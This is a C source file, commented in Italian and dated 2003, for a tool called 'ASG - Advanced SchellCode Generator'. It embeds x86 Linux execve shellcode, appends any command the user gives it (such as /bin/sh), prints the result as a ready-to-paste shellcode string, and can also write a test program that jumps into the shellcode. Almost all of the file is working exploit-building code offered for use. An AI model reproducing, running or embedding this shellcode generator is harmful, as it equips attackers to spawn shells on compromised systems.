/*
     ASG - Advanced SchellCode Generator 1.1-1
     CODED by R[]l4nD - xrol4nd@hotmail.com

     REL: 8.8.2003

	 ASG è un generatore di ShellCode personalizzati
	 molto semplice da utilizzare;

	 Compilazione: gcc -o asg asg.c

	 Utilizzo: ./asg [comando][file di prova(opzionale)]

		[comando]: comando da far eseguire allo shellcode (/bin/sh per una shell)
		[file di prova(opzionale)]: crea un sorgente c che permette di provare
		                            lo shellcode generato. Attenzione! Leggi bene
		                            le indicazioni riportate nell'intestazione del file.
									
		ES: ./asg /bin/sh prova.c
									
		PER QUALSIASI COMMENTO, SUGGERIMENTO O SEGNALAZIONE BUG
		CONTATTAMI PURE ALL'INDIRIZZO: xrol4nd@hotmail.com

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#define VERSION         1.1-1
#define CODER           R[]l4nD



char cmd[1024];
const char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
                         "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
                         "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
                         "\xe8\xdc\xff\xff\xff";

//Codice C corrispondente
/* 
void main(){
   char *name[2];
   name[0] = "comando";
   name[1] = 0x0;
   execve(name[0],name,0x0);
}
*/

void uso(void);
void printShell(char str[1024]);
void progC(void);
void saveFile(char buf[1024], char file[1024]);


main(int argc, char *argv[]){

	char comando[1024], file[1024], buf[1024];
	int n;

	if ((argc<2) || (argc>3)){
	    uso();
	    exit(0);
	}

		strncpy(comando,argv[1],sizeof(comando));

	if (argc==3)
		strncpy(file,argv[2],sizeof(file));

	strncpy(buf,shellcode,sizeof(buf));
    strncat(buf,comando,sizeof(buf));
	strncpy(cmd,comando,sizeof(cmd));

	printf("\n\tASG - Advanced SchellCode Generator 1.1-1\n"
               "\tCODED by R[]l4nD - xrol4nd@hotmail.com\n"
               "\tREL: 8.8.2003\n\n\n");
			   
			   printf("- Generazione ShellCode in corso...\n");
			   
			   progC();

	           printf("\n- Comando da integrare: %s\n", comando);
			   printf("\n- Dimensione puntatore: %d byte\n", strlen(comando));
			   printf("\n- Dimensione ShellCode: %d byte\n\n\n", strlen(buf));

			   printf(" char shellcode[]= """);

	printShell(buf);


	printf("\n [-]>- Generazione ShellCode completata con successo!\n\n");

	

    if (argc==3)
		saveFile(buf,file);


}


//Stampa le istruzioni d'uso
void uso(void){

	printf("\n");
	printf("\tASG - Advanced SchellCode Generator 1.1-1\n"
               "\tCODED by R[]l4nD - xrol4nd@hotmail.com\n"
               "\tREL: 8.8.2003\n\n"
	       "\tUSO:\t./asg [comando][file di prova(opzionale)]\n\n");

}


//Stampa lo shellcode
void printShell(char str[1024]){
	int n;
	printf("\"");
	for (n=0;n<strlen(str);n++){
		printf ("\\x%02x",str[n]& 0xff);
		if ((n==11) || (n==23) || (n==35) || (n==47)) printf("\"\n                   \"");
	}
	printf("\";\n\n");
}



void progC(void){

	printf("\n- Codice Shell utilizzato:\n\n");
	printf(" void main(){\n");
	printf("    char *var[2];\n");
	printf("    var[0] = \"%s\";\n",cmd);
	printf("    var[1] = 0x0;\n");
	printf("    execve(var[0],var,0x0);\n");
	printf(" }\n\n");

}


void saveFile(char buf[1024], char file[1024]){

	FILE *fp;
	int n;

	if ((fp = fopen(file,"w"))==NULL){
		printf("\n - [ERRORE] - Errore durante la scrittura del file.\n\n");
	} else {

		fprintf(fp,"/*SEMPLICE PROGRAMMA PER TESTARE LO SHELLCODE  GENERATO:\n\n     by R[]l4nD\n\n");
		fprintf(fp,"ATTENZIONE!!!!!\n");
		fprintf(fp,"SE ALL'AVVIO DEL PROGRAMMA VIENE RESTITUITO UN ERRORE DI SEGMENTAZIONE\n");
		fprintf(fp,"(SEGMENTATION FAULT) SARA' NECESSARIO MODIFICARE\n");
		fprintf(fp,"L'OFFSET DELLO SHELLCODE NELLA CHIAMATA ASSEMBLER:\n");
		fprintf(fp,"__asm__(\"call INDIRIZZO\");\n");
		fprintf(fp,"Quello corretto viene fornito da Offset Buffer: 0xXXXXX*/\n\n");

		fprintf(fp,"#include <stdio.h>\n\n\n",fp);
		fprintf(fp," char shellcode[]= """);

	    fprintf(fp,"\"");

		for (n=0;n<strlen(buf);n++){
			fprintf (fp,"\\x%02x",buf[n]& 0xff);
		 	if ((n==11) || (n==23) || (n==35)  || (n==47)) fprintf(fp,"\"\n                   \"");
	  	}
		fprintf(fp,"\";\n\n");

		fprintf(fp,"main(){");
		fprintf(fp,"\n\n");
		fprintf(fp,"\tprintf(\"\\n\\nOffset Buffer: 0x%%x\\n\\n\",&shellcode);");
		fprintf(fp,"\n\t__asm__(\"call 0x8049400\");");

        fprintf(fp,"\n\n}\n");


	fclose(fp);


	printf(" [-]>- Creazione file di prova completata!\n\n");


	}





}